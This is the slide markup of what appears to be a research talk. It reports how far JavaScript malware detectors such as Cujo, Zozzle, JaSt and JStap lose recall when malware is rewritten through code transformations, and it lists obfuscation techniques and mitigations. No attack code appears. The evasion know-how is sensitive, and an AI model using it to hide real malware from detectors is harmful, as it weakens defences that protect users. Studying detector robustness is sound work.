                      <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.96 (4,882/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.98 (4,410/4,502)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.98 (4,412/4,502) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ct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49075">
                <a:tc gridSpan="6">
                  <a:txBody>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Combined transformations:</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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All sync (using T4(a)) </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0.18 (416/2,255)</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0.63 (3,450/5,450) </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0.22 (1,104/5,105)</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0.00 (1/4,235) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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0.18 (766/4,235)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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12"/>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All sync (using T4(b))</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0.19 (415/2,205) </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0.63 (3,428/5,450)</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0.18 (931/5,105)</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0.00 (0/4,243)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.08 (350/4,243)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="881" name="Google Shape;881;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48</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Google Shape;882;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51275" y="936400"/>
            <a:ext cx="9039600" cy="423600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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83" name="Google Shape;883;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51275" y="1360025"/>
            <a:ext cx="9039600" cy="2371800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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84" name="Google Shape;884;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47275" y="3731850"/>
            <a:ext cx="9039600" cy="931367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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8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88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74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314152" y="9144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400" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Recall of Malware Detectors</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="890" name="Google Shape;890;p74"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="117986" y="640080"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{19842F14-65A5-4413-9061-7BFCEAB78F2E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1944725">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1332125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1409925">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1342625">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1468600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="249075">
                <a:tc>
                  <a:txBody>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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Technique</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Cujo</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Zozzle</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JaSt</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JStap (NGrams)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JStap (Values)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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512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Baseline: No transformation</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0.98 (5,548/5,649) </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0.66 (3,598/5,453) </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0.99 (5,076/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100"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0.99 (4,483/4,524)</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0.98 (4,439/4,524)</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49075">
                <a:tc gridSpan="6">
                  <a:txBody>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Individual transformations:</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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T1-StringLiteral</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.61 (1,623/2,644)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.62 (3,387/5,453)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0.66 (3,393/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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0.36 (1,539/4,257)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.43 (1,839/4,257) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF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3"/>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T2-ArrayInitialization</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0.94 (4,050/4,292)</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0.66 (3,593/5,450)</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0.85 (4,360/5,105)</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0.86 (3,890/4,505)</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0.89 (4,009/4,505)</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4"/>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T3-FunctionName</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0.67 (2,780/4,159)</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0.65 (3,550/5,453)</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0.69 (3,512/5,108)</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0.57 (2,747/4,810)</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0.72 (3,463/4,810)</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5"/>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T4-CallExpression(a)</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0.71 (3,040/4,285)</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0.64 (3,507/5,453)</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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.38 (1,943/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF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0.37 (1,723/4,633)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0.78 (3,613/4,633)</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6"/>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T4-CallExpression(b)</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0.82 (3,385/4,115)</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0.63 (3,424/5,453)</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0.44 (2,253/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.23 (1,058/4,586)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF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0.73 (3,369/4,586) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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7"/>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T5-IfStatement</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0.82 (3,513/4,301)</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0.64 (3,505/5,453)</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0.89 (4,535/5,108)</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0.83 (3,717/4,501)</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0.93 (4,178/4,501)</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8"/>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T6-ForStatement</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0.90 (3,877/4,299)</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0.66 (3,578/5,453)</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0.92 (4,720/5,108)</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0.87 (3,872/4,465)</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0.98 (4,360/4,465)</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9"/>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Sync, T7-WhileStatement</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0.90 (3,904/4,321)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.66 (3,598/5,453)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.96 (4,882/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.98 (4,410/4,502)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.98 (4,412/4,502) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ct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49075">
                <a:tc gridSpan="6">
                  <a:txBody>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Combined transformations:</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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All sync (using T4(a)) </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0.18 (416/2,255)</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0.63 (3,450/5,450) </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0.22 (1,104/5,105)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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0.00 (1/4,235) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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0.18 (766/4,235)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ct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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="249075">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All sync (using T4(b))</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0.19 (415/2,205) </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0.63 (3,428/5,450)</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0.18 (931/5,105)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.00 (0/4,243)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.08 (350/4,243)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="891" name="Google Shape;891;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49</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74050" y="1664825"/>
            <a:ext cx="8973600" cy="254700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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93" name="Google Shape;893;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74050" y="2427050"/>
            <a:ext cx="8973600" cy="254700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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94" name="Google Shape;894;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74050" y="2679725"/>
            <a:ext cx="8984400" cy="254700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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9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1"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="89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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285775" y="3829092"/>
            <a:ext cx="6572400" cy="954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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Transform malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> the JavaScript language</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;19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
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796827" y="1052798"/>
            <a:ext cx="3820800" cy="227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2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Identifier Renaming</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Dead Code Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>String Manipulation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Control Flow Flattening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>AST rewriting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="746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Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr sz="3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97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Google Shape;900;p7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sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Dynamic analysis-based malware detection</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="24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SzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Disable WebAssembly</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="24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SzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Jointly analyze JavaScript and WebAssembly</a:t>
            </a:r>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7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97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Related Work</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Google Shape;906;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="3999900" cy="3750300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-318632" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
